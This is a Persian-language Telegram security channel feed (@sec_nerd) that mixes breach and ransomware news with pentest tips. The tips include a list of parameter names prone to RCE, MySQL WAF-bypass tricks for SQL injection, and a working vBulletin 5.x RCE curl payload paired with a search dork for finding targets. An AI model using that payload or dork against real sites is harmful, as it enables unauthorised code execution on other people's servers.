امنیت اطلاعات
846 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
پارامترهای معمول آسیب پذیر در برابر حملات RCE

cmd
exec
command
execute
ping
query
jump
code
reg
do
func
arg
option
load
process
step
read
function
req
feature
exe
module
payload
run
print


#rce


@sec_nerd
Mysql waf bypasses to cash on SQL-Injection bugs

1. select '\f\l\a\g'='flag'; // This is true
2. All are same
* select 'abcd';
* select 0x61626364;
* select 0b01100001011000100110001101100100;
3. select 'admin' = 'àdmin'; // is true if utf8 is allowed

#bugbounty
#sqli

@sec_nerd
دسترسی به ادمین دامین یک دانشگاه در ایالت فلوریدا به بیش از ۵ هزار کلاینت به مبلغ 1.5 بیت کوین به فروش گذاشته شده است

#breach #news

@sec_nerd
باج افزار Netwalker در عرض ۵ ماه ۲۵ میلیون دلار درآمد داشته است!

این باج افزار سازمانهای بزرگ را هدف قرار میدهد و قادر به تسخیر شبکه داخلی است.

اهداف نت واکر در طی این ۵ ماه شامل:
شرکت Toll Group از استرالیا
دانشگاه ایالت میشیگان
UC san fransicsco
مرکز سلامت Lorien
گروه Dussmann آلمان



https://www.bleepingcomputer.com/news/security/netwalker-ransomware-earned-25-million-in-just-five-months/


#news
#ransom


@sec_nerd
رایت آپ کشف آسیب پذیری RCE بر روی روتر های مبین نت توسط دو محقق امنیتی که از دوستان کانال و گروه هم هستند


https://medium.com/@maj0rmil4d/seowon-slc-130-router-rce-unlocking-writeup-90854ae2eb0e


#writeup
#rce
#mobinnet


@sec_nerd
روز گذشته ده ها حساب معروف در reddit به بهانه ی حمایت از کمپین انتخاباتی دونالد ترامپ توسط هکرها دیفیس شدند.

این عملیات با هک شدن حساب مدیران ساب ردیتهای معروفی همچون NFL و CFB و … انجام شده است.
حمله ی مذکور پس از بن شدن صفحه ی طرفداران ترامپ در ردیت اتفاق افتاد و یک اکانت که به هیچ پیامی پاسخ نمیدهد، مسئولیت این حمله را در توییتر به عهده گرفته است.

https://www.zdnet.com/article/hackers-are-defacing-reddit-with-pro-trump-messages/

#news #breach #usa #reddit


@sec_nerd
تیم امنیتی Checkpoint آسیب پذیری جدیدی را در پردازنده های Qualcomm کشف کرده است که بیش از یک میلیارد دستگاه تلفن همراه را در معرض خطر قرار میدهد.
پردازنده های Snapdragon که در دستگاه های اندرویدی شرکت های گوگل، سامسونگ، ال جی، شیائومی و … مورد استفاده قرار میگیرد به مهاجمان اجازه میدهد:
بطور کامل از گوشی جاسوسی کرده و تمام اطلاعات آن شامل تصاویر،ویدیوها،تماسها، صدای میکروفن و اطلاعات مکانی گوشی را دریافت کند
تمامی داده های موجود در گوشی را بصورت دائمی از بین ببرد
بدافزارها بصورت کامل میتوانند بر روی گوشی اجرا و غیر قابل حذف شوند.


شناسه های ثبت شده برای این آسیب پذیری ها:
CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209


https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/


#news
#android

@sec_nerd
بیست گیگابایت از اطلاعات حساس و سورس کدهای شرکت اینتل در دارک وب به فروش گذاشته شده است!


#news
#breach
#intel


@sec_nerd
نفوذ به مرسدس بنز و در دست گرفتن کنترل آن در کنفرانس بلک هت ۲۰۲۰

https://i.blackhat.com/USA-20/Thursday/us-20-Yan-Security-Research-On-Mercedes-Benz-From-Hardware-To-Car-Control.pdf


#iot #blackhat
#pentest

@sec_nerd
0day RCE exploit on vBulletin 5xx

dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#vbulletin
#rce
#pentest
#web

@sec_nerd
یکی از کارکنان شرکت SANS هک شد!
ایمیل این کارمند سنز با حمله ی فیشینگ توسط یک هکر ناشناس مورد نفوذ قرار گرفت و برخی قوانین فوروارد به آن اضافه شد که منجر به لو رفتن برخی اطلاعات غیرحساس گردید.

این اطلاعات شامل ۲۸ هزار آدرس ایمیل و عنوان شغلی، کشور محل زندگی و .. از کارکنان سنز می باشد.

شرکت SANS یک شرکت شناخته شده در عرصه آموزش امنیت سایبری میباشد.


https://www.sans.org/dataincident2020


#sans
#breach #news


@sec_nerd